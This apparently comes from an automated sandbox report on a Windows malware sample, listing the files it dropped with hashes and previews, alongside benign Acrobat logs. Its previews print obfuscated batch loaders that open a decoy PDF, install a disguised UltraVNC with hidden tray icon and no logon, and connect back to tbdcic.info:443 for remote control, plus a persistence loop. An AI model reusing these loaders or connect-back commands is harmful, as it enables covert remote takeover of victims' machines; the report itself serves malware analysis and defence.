Preview:	@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0f

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\go3uE.OUJMA

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.233343202654504
Encrypted:	false
SSDEEP:	24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
MD5:	C55EEA597023B8C774986495ECAE5B33
SHA1:	279315CE36021D2C86AE97EBFAA528749FA89544
SHA-256:	75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
SHA-512:	D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h

Download File

Process:	C:\Users\user\Desktop\T8xrZb7nBL.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI8df2b.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5160983163107673
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkTH:Qw946cPbiOxDlbYnuRKDlDTH
MD5:	803AA3006BE1A79C63F9BBDF89CD9A77
SHA1:	F3035C65099CB0C8CF870E8F696972A5CAD1D559
SHA-256:	FD07FFFD1A2C8EF56B2D7E8317519F07E8B2E138F636CFB06EFF226E4E7D685E
SHA-512:	89DB3C0055EAF6BBF8195AA093F77BC52AE252B9451929FDFE7597ED20C6DB525A81D72A62C9F62505FB0B60DA5482779FD1A949EFB60D04CACE7ADFA352337C
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.2.5. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-29-19-023.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.386483451061953
Encrypted:	false
SSDEEP:	384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
MD5:	F49CA270724D610D1589E217EA78D6D1
SHA1:	22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
SHA-256:	D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
SHA-512:	181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
Malicious:	false
Preview:	SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.3739518933239605
Encrypted:	false
SSDEEP:	384:O8OlGorfkTyXYfNqQmciNfbuCZ8LOiWj/cs6wc6EYESfFKVMEb/PyVyXaH5Y69FF:qny9u
MD5:	47066623FA015C885EAF92F4FA554B6E
SHA1:	A0DC1FDECDCBD23F3EFD94E4F7F0D6726D5AD7DF
SHA-256:	9843F3BB96A6A8B3EBC00FF35017EE87BF7F4C2E0EF9BB05D64682DA677AD308
SHA-512:	CC97613EB2384434DFC6AB2B908DDE814010F5BEA3617C361F8D20AC65B036569FFA41FC7E57B5C4CE855289301472644DE78B09E2EB68A19074365B60A20322
Malicious:	false
Preview:	SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:205-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35721
Entropy (8bit):	5.4143366959605475
Encrypted:	false
SSDEEP:	768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRXearKE733iFdpnK:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRh
MD5:	BEC718BA80295C99E66EF6A9F961AD22
SHA1:	7EB0FBFEA1F83F8F05A2DAC2A41C5904763A811D
SHA-256:	0EA27649CBCA9B75E70C6A87E8498E310A79F6F14E8F5C48EC1CE5FA8D269F59
SHA-512:	5D246C0489EB16802D3717F8399552A0C31BA29AF4827153F579B47468FF586784495FB519C71224E11BF4D44D038E0B4D8C0686F3F8B0245CFEA379EB8E5A87
Malicious:	false
Preview:	05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\99217399-67eb-4923-92d9-d537a3351833.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\b657329b-e9cf-488b-a819-747f1b4c3a43.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/bwYIGNP49WL07oDGZfNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:DwZG69WLxDGZN3mlind9i4ufFXpAXkru
MD5:	03BFEC80D6B1DF14D793604D4F394149
SHA1:	BEBD26512F1FECAF94443E3DDEABC77D7DD45066
SHA-256:	4C74AAEFB0EA762202A9B66DE10C3407BCF978344115C8101F11A61638E97952
SHA-512:	EF3A77DAC9F2DDE1277D607D65C856D204D78513F26C21253B4B76CB3D4D3201E6B9BA8AF7CE890C2DD4595A7D26ED96624181182724DC830BEDF85334838740
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\bea0250d-298d-4002-9bc5-66c593604a15.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\ce8d7ff9-0f26-49e7-b973-3370390babe4.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xXkwYIGNPldpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:J0wZGP3mlind9i4ufFXpAXkrfUs0qWLk
MD5:	D35ABC179F98F8D15ECBBD1A7BF27B5A
SHA1:	2467D0FC2DD605B46D6EB9FC0219D1E28B311590
SHA-256:	E6EA0608B943D686875D3088D1DF899F75C8B65612154EE82CE60390669F5C66
SHA-512:	203BC7CD461AB754C5C7E1C534E1582EADCF4CC4549AA706CCD5E99F4768D131C503E63796073A6B95E32D7F6F7D661C7DD33A75EDBB3E825B2EBA30F4D993FC
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\Downloads\Lom.pdf

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\3889122.Khe9oLY

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	503
Entropy (8bit):	5.353292454999417
Encrypted:	false
SSDEEP:	12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
MD5:	41F0189B83E9D493B86D7182B3514F9D
SHA1:	D4EC6020DE07E7D10552189CE4025B220467A522
SHA-256:	7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
SHA-512:	AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

C:\Windows\Tasks\3889122.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	503
Entropy (8bit):	5.353292454999417
Encrypted:	false
SSDEEP:	12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
MD5:	41F0189B83E9D493B86D7182B3514F9D
SHA1:	D4EC6020DE07E7D10552189CE4025B220467A522
SHA-256:	7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
SHA-512:	AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
Malicious:	false
